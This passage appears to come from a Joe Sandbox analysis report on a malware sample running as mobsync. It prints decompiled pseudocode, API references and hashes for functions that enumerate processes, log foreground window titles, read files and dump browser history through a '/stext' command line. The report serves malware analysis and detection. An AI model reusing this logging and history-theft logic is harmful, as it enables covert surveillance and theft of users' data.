											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00431810(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00450650( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00450350();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00450350();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00450350();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00442793(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00450730(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = L00439E14();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043626D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00442490
0x0044249b
0x004424a2
0x004424a4
0x004424a4
0x004424a6
0x004424af
0x004424b1
0x004424b6
0x004424bc
0x004424d2
0x004424d7
0x004424da
0x004424e7
0x004424ec
0x00442540
0x00442548
0x0044254a
0x0044254c
0x0044254f
0x0044254f
0x0044254f
0x00442555
0x0044255d
0x00442570
0x00442573
0x00442575
0x00442578
0x00442579
0x0044259a
0x0044259d
0x0044259d
0x0044257b
0x0044257b
0x0044257d
0x00442588
0x00442588
0x0044258a
0x00442591
0x0044258c
0x0044258c
0x0044258c
0x0044258a
0x0044259e
0x004425a0
0x004425a1
0x004425a4
0x004425a6
0x004425b0
0x004425ba
0x004425a8
0x004425a8
0x004425a8
0x004425bf
0x004425bf
0x004425c4
0x004425c7
0x004425d2
0x004425d2
0x004425d2
0x004425d2
0x004425d6
0x004425dd
0x004425de
0x004425e1
0x004425e4
0x004425e4
0x004425e6
0x00000000
0x00000000
0x004425fe
0x00442605
0x00442609
0x0044260c
0x0044260f
0x00442611
0x00442611
0x00442611
0x00442613
0x00442616
0x00442619
0x0044261b
0x00442623
0x00442629
0x0044262c
0x0044262f
0x00442630
0x00442633
0x00442636
0x00442636
0x0044263b
0x0044263e
0x00000000
0x00000000
0x00442656
0x0044265b
0x0044265f
0x00000000
0x00000000
0x00442663
0x00442663
0x00442666
0x00442667
0x00442667
0x00442669
0x0044266c
0x00000000
0x00000000
0x0044266e
0x00442671
0x00442678
0x0044267b
0x0044267e
0x00442694
0x00442694
0x00442694
0x00442680
0x00442680
0x00442682
0x00442685
0x00442690
0x00442687
0x0044268a
0x0044268a
0x00442685
0x00000000
0x0044267e
0x00442673
0x00442673
0x00442675
0x00442675
0x004425c9
0x004425c9
0x004425cc
0x00442697
0x00442697
0x00442699
0x0044269b
0x0044269e
0x0044269f
0x004426a0
0x004426a1
0x004426a9
0x004426a9
0x004426a9
0x004426ab
0x004426ae
0x004426b1
0x004426b3
0x004426b3
0x004426b5
0x004426c7
0x004426cb
0x004426ce
0x004426d5
0x004426dd
0x004426dd
0x004426e0
0x004426e2
0x004426f3
0x004426f3
0x004426f7
0x004426f7
0x004426fa
0x004426fc
0x004426ff
0x00000000
0x004426e4
0x004426e4
0x004426ea
0x004426ea
0x004426ee
0x00442701
0x00442701
0x00442705
0x00442706
0x00442708
0x0044270a
0x0044274b
0x0044274b
0x0044274d
0x0044275a
0x0044275a
0x0044275c
0x0044275e
0x0044275f
0x00442760
0x00442767
0x0044276a
0x0044276c
0x0044276c
0x0044276d
0x0044276f
0x00442772
0x00442772
0x00442774
0x00442776
0x00000000
0x00442776
0x0044274f
0x00442751
0x00000000
0x00000000
0x00442753
0x00000000
0x00000000
0x00442755
0x00442758
0x00000000
0x00000000
0x00000000
0x00442758
0x00442711
0x00442717
0x00442717
0x00442719
0x0044271a
0x0044271b
0x0044271c
0x00442723
0x00442726
0x00442728
0x00442729
0x0044272b
0x00442738
0x00442738
0x0044273a
0x0044273c
0x0044273d
0x0044273e
0x00442745
0x00442748
0x0044274a
0x0044274a
0x00000000
0x0044274a
0x0044272d
0x0044272d
0x0044272f
0x00000000
0x00000000
0x00442731
0x00000000
0x00000000
0x00442733
0x00442736
0x00000000
0x00000000
0x00000000
0x00442736
0x00442713
0x00442715
0x00000000
0x00000000
0x00000000
0x00442715
0x004426e6
0x004426e8
0x00000000
0x00000000
0x00000000
0x004426e8
0x004426e2
0x00000000
0x004425cc
0x004425c7
0x004424ee
0x004424f0
0x00000000
0x004424f2
0x00442508
0x0044250d
0x0044250f
0x0044251b
0x00442521
0x00442522
0x00442524
0x00442526
0x00442531
0x00442531
0x00442534
0x00442536
0x00442536
0x00442539
0x00442511
0x00442511
0x00442511
0x00000000
0x0044250f
0x004424be
0x004424be
0x004424c5
0x004424c6
0x004424c8
0x0044277a
0x0044277e
0x00442783
0x00442783
0x00442792
0x00442792

APIs

_strrchr.LIBCMT ref: 0044251B
__alldvrm.LIBCMT ref: 0044271C
__alldvrm.LIBCMT ref: 0044273E

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e8fbe84c994fb0ff5f685f71fb16adb52fd129ac609365cd6321b78b6f618501
Instruction ID: 63a792aad3bfe3cbde7ecdf4ead5abea7afdf704ef8a669ef2216d63f232220a
Opcode Fuzzy Hash: e8fbe84c994fb0ff5f685f71fb16adb52fd129ac609365cd6321b78b6f618501
Instruction Fuzzy Hash: C0A158719003869FFB118F28C9917AEBBA4EF55310F5541AFF4859B382C6BC9D41C758

Uniqueness

Uniqueness Score: -1.00%

Function 0043B0B1, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043B0B1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00450430(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591c8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x459194;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00450430(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00450430(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = L00439E14();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = L00439E14();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043626D();
					goto L11;
				}
				_t71 = L00439E14();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043626D();
				return _t103;
			}

0x0043b0ba
0x0043b0bf
0x0043b0df
0x0043b0e0
0x0043b0e2
0x0043b0e5
0x0043b0e7
0x0043b0fa
0x0043b0fd
0x0043b0ff
0x0043b102
0x0043b105
0x0043b108
0x0043b113
0x0043b115
0x0043b116
0x0043b118
0x0043b134
0x0043b138
0x0043b141
0x0043b146
0x0043b14d
0x0043b15a
0x0043b15f
0x0043b169
0x0043b16e
0x0043b173
0x0043b175
0x0043b17c
0x0043b17e
0x0043b17e
0x0043b183
0x0043b188
0x0043b189
0x0043b18c
0x0043b194
0x0043b194
0x0043b195
0x0043b1a3
0x0043b1ab
0x0043b1b8
0x0043b1b9
0x0043b1c3
0x0043b1c9
0x0043b1d3
0x0043b1da
0x0043b1de
0x0043b1e2
0x0043b1e7
0x0043b1eb
0x0043b1f3
0x0043b1f3
0x0043b1f5
0x0043b1f8
0x00000000
0x0043b18e
0x0043b18e
0x0043b18e
0x0043b18f
0x0043b18f
0x00000000
0x0043b18e
0x0043b18c
0x0043b11a
0x0043b123
0x0043b123
0x0043b12a
0x0043b12b
0x0043b12d
0x0043b12d
0x00000000
0x0043b12d
0x0043b11c
0x0043b121
0x00000000
0x00000000
0x00000000
0x0043b121
0x0043b10a
0x00000000
0x00000000
0x0043b10c
0x0043b111
0x00000000
0x00000000
0x00000000
0x0043b111
0x0043b0e9
0x0043b0f0
0x0043b0f1
0x0043b0f3
0x00000000
0x0043b0f3
0x0043b0c1
0x0043b0c8
0x0043b0c9
0x0043b0cb
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
Opcode Fuzzy Hash: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5B1, Relevance: 6.1, APIs: 4, Instructions: 127
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5B1(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020B5(__ebx, __ecx);
				 *0x46beb4 = L00416F6C(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040425F(_t76,  &_v28,  &_v864);
						_t47 = L00416B7E(_t76,  &_v340, L00416F9A(_v892) & 0x000000ff);
						_t48 = L00416B7E(_t76,  &_v316, _v892);
						_t50 = L00416CF4(_t76,  &_v268, L00416FD0( &_v292, _v892));
						L00401FB1(_t129, _t58, _t130, E0040530D(_t76,  &_v52, L00402EFD( &_v76, E0040530D(_t76,  &_v100, L00402EFD( &_v124, E0040530D(_t76,  &_v148, L00402EFD( &_v172, E0040530D(_t76,  &_v196, E004074F2(_t76,  &_v220, _t129, __eflags, L00416CF4(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x460634), _t50), _t129, __eflags, 0x460634), _t48), _t129, __eflags, 0x460634), _t47), _t129, __eflags, "|"));
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00401FA7();
						L00401FA7();
						L00401ED0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}

0x0040d5b1
0x0040d5b1
0x0040d5bc
0x0040d5be
0x0040d5cc
0x0040d5d7
0x0040d5db
0x0040d5e7
0x0040d5f3
0x0040d772
0x0040d608
0x0040d626
0x0040d63d
0x0040d661
0x0040d6e2
0x0040d6ea
0x0040d6f2
0x0040d6fa
0x0040d702
0x0040d70d
0x0040d718
0x0040d723
0x0040d72e
0x0040d739
0x0040d744
0x0040d74f
0x0040d75a
0x0040d765
0x0040d76d
0x0040d76d
0x0040d789
0x0040d789
0x0040d796

APIs

Part of subcall function 00416F6C: GetCurrentProcess.KERNEL32(?,?,?,00417A29,WinDir,00000000,00000000), ref: 00416F7D
Part of subcall function 00416F6C: IsWow64Process.KERNEL32(00000000,?,?,00417A29,WinDir,00000000,00000000), ref: 00416F84

CreateToolhelp32Snapshot.KERNEL32 ref: 0040D5D1
Process32FirstW.KERNEL32 ref: 0040D5F3
Process32NextW.KERNEL32 ref: 0040D77A
CloseHandle.KERNEL32(00000000), ref: 0040D789

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
String ID:
API String ID: 715332099-0
Opcode ID: 16901b7e6e0c241fb2a112d25d02948d698495c8d8c8435bcbe441ce28ae8152
Instruction ID: d2b0c1bf7218dab9c36398846b3bef5936211f0d8f53bb00f93021c478d55916
Opcode Fuzzy Hash: 16901b7e6e0c241fb2a112d25d02948d698495c8d8c8435bcbe441ce28ae8152
Instruction Fuzzy Hash: 00414071A002195AC719FB61DC51EEEB375AF50304F5041BFB409A71E2EF786E8ACE88

Uniqueness

Uniqueness Score: -1.00%

Function 00408A53, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408A53() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					E00431810(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = L00401F75(L00401E29(0x46c578, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040425F(_t34, _t66, _t15);
						_t17 = E00417417( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E004043E5(_t34,  &_v2056, L"\r\n[ ", __eflags, E0040425F(_t34,  &_v2028,  &_v2004));
					L00401EDA(_t61 + 4, _t20, _t61, E00403086(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
					_t67 = _t65 - 0x18;
					E00407352(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00408744(_t61);
					while(1) {
						_t30 = L00401F75(L00401E29(0x46c578, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040425F(_t34, _t68, _t30);
						_t32 = E00417417(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E004095AB(_t34, _t61);
				}
			}

0x00408a56
0x00408a56
0x00408a59
0x00408a5f
0x00408a62
0x00408a68
0x00408a6a
0x00408a76
0x00408a7b
0x00408a7e
0x00408a8c
0x00408a91
0x00408a97
0x00408aa0
0x00408aa5
0x00408aa8
0x00408aaa
0x00000000
0x00000000
0x00408ab1
0x00408ab1
0x00408ad8
0x00408ae8
0x00408af1
0x00408afa
0x00408b03
0x00408b08
0x00408b11
0x00408b18
0x00408b1d
0x00408b2b
0x00408b30
0x00408b36
0x00408b3d
0x00408b42
0x00408b45
0x00408b47
0x00000000
0x00000000
0x00408b4b
0x00408b4b
0x00408b51
0x00408b51

APIs

Part of subcall function 00417417: GetForegroundWindow.USER32(75146490,?), ref: 00417427
Part of subcall function 00417417: GetWindowTextLengthW.USER32(00000000), ref: 00417430
Part of subcall function 00417417: GetWindowTextW.USER32 ref: 0041745A

Sleep.KERNEL32(000001F4), ref: 00408AB1
Sleep.KERNEL32(00000064), ref: 00408B4B

Strings

[ , xrefs: 00408AC9
], xrefs: 00408AB5

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: d952f014653b60e5825bc352eaa46e3a1841bf2aea161cff5eefdb2db6847e20
Instruction ID: cca0d05e2164998ef68a958f21fdddd47f0264d2a0f8426d28c401fd19228762
Opcode Fuzzy Hash: d952f014653b60e5825bc352eaa46e3a1841bf2aea161cff5eefdb2db6847e20
Instruction Fuzzy Hash: 5721CFB1A0420067C604F676DD17A6E72699F80748F40043FF982772E3EE3DAA09869F

Uniqueness

Uniqueness Score: -1.00%

Function 00417334, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417334(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00402439(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x00417337
0x00417338
0x0041733b
0x0041733d
0x00417357
0x0041735c
0x0041736e
0x00417372
0x00417380
0x00417393
0x00417395
0x00417395
0x00417398
0x0041739e
0x0041735e
0x0041735e
0x0041735e
0x004173a5

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,0041309D), ref: 00417351
GetFileSize.KERNEL32(00000000,00000000,00000000,?,0041309D), ref: 00417365
ReadFile.KERNEL32(00000000,00000000,00000000,0041309D,00000000,00000000,00000000,?,0041309D), ref: 0041738A
CloseHandle.KERNEL32(00000000,0041309D), ref: 00417398

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 4189ae2b209805b2b74489fef5e0d6e6ba163a0356bac3440ab6100b39f778ce
Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
Opcode Fuzzy Hash: 4189ae2b209805b2b74489fef5e0d6e6ba163a0356bac3440ab6100b39f778ce
Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634

Uniqueness

Uniqueness Score: -1.00%

Function 00431611, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431611() {
				void* _t4;
				void* _t8;

				E00434851();
				E004315A5();
				if(E00434AA5() != 0) {
					_t4 = E00434A57(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00434AE1();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00431611
0x00431616
0x00431622
0x00431627
0x0043162c
0x0043162e
0x00431639
0x00431630
0x00431630
0x00000000
0x00431630
0x00431624
0x00431624
0x00431626
0x00431626

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431611
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431616
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043161B

Part of subcall function 00434AA5: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00434AB6

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431630

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction ID: 5bd34e3a9dce145a3b421456380c81e9cc1b8235ab00a0158aa2437511a3e12d
Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction Fuzzy Hash: 59C04C58484180162C543AF222035EE13602CFF39DF9534CFA8A117523890E640B683F

Uniqueness

Uniqueness Score: -1.00%

Function 0040412D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040412D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020B5(__ebx,  &_v52);
				E00417967( &_v28, 0x30, L00401F75(E004169EB( &_v76)));
				L00401FA7();
				L00401F75(0x46c1a0);
				L00413CCA(L00401ECB(E00403086(_t48,  &_v100, E00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t84 = 0;
				while(1) {
					_t40 = L00401ECB( &_v28);
					_t80 =  &_v52;
					if(E00417334(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401ED0();
					L00401FA7();
					return _t81;
				}
				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404A6E(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

0x0040412d
0x00404144
0x00404147
0x00404150
0x0040416a
0x00404173
0x0040417d
0x004041d1
0x004041d9
0x004041e1
0x004041ec
0x004041f7
0x004041fc
0x004041fe
0x00404201
0x00404206
0x00404212
0x00000000
0x00000000
0x00404219
0x0040421f
0x00404223
0x00000000
0x00000000
0x00404225
0x00404247
0x0040424a
0x00404252
0x0040425e
0x0040425e
0x00404230
0x00404235
0x0040423f
0x00404246
0x00404246
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147

Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,7519FBB0,00000000,?,?,?,?,?,0040B275,.vbs), ref: 00416A12

Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,0041309D), ref: 00417351

Sleep.KERNEL32(000000FA,0045F454), ref: 00404219

Strings

/sort "Visit Time" /stext ", xrefs: 00404193

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

